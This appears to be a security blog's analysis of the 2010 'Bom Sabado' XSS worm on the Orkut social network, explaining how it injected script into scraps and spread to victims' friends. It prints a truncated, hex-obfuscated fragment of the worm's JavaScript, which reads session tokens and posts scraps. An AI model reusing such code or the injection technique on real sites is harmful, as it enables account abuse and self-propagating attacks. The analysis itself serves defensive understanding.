Orkut, a popular social networking site, was hit by a new worm on Saturday, September 25, 2010. The worm uses a XSS exploit on the Orkut website that allows malware writers to inject malicious javascript files using iframe tags in the scrap text. The body the scrap text will read “Bom Sabado!”
In fig 1 you can see the html code of the infected scrap.
Fig1 Infected Scrap
Given below is a portion of JavaScript code file
var _0x37a1=["\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x74\x74\x70","\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E\x3D","\x43\x47\x49\x2E\x50\x4F\x53\x54\x5F\x54\x4F\x4B\x45\x4E","\x26\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x3D","\x50\x61\x67\x65\x2E\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x72\x61\x77","\x50\x4F\x53\x54",……………….
function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var…..
As you can see, the script is obfuscated. The malicious purposes will appear when a deobfuscation script is run.
Here is the deobfuscated script code in fig 2.
Fig2 Deobfuscated JavaScript Code
It enumerates the friends list and sends the infected scrap to everyone, fig 3
Fig3 Spreading to all friends
The most interesting part in the script code is the function which sends the malicious scrap, illustrated by fig 4
Fig4 XSS exploitation
As you can see, it exploits the XSS vulnerability on the Orkut site and embeds the iframe tag in the scrap text. Since the onLoad event is used to create the script tag, there is no user interaction needed to execute the malicious script.
It also send join request to some Orkut communities, possibly to track the infection status, fig 5.
Fig5 Join Communities
Add comment
If you find the content of this comment offensive, you can report it and our crew will have a look at it
Comments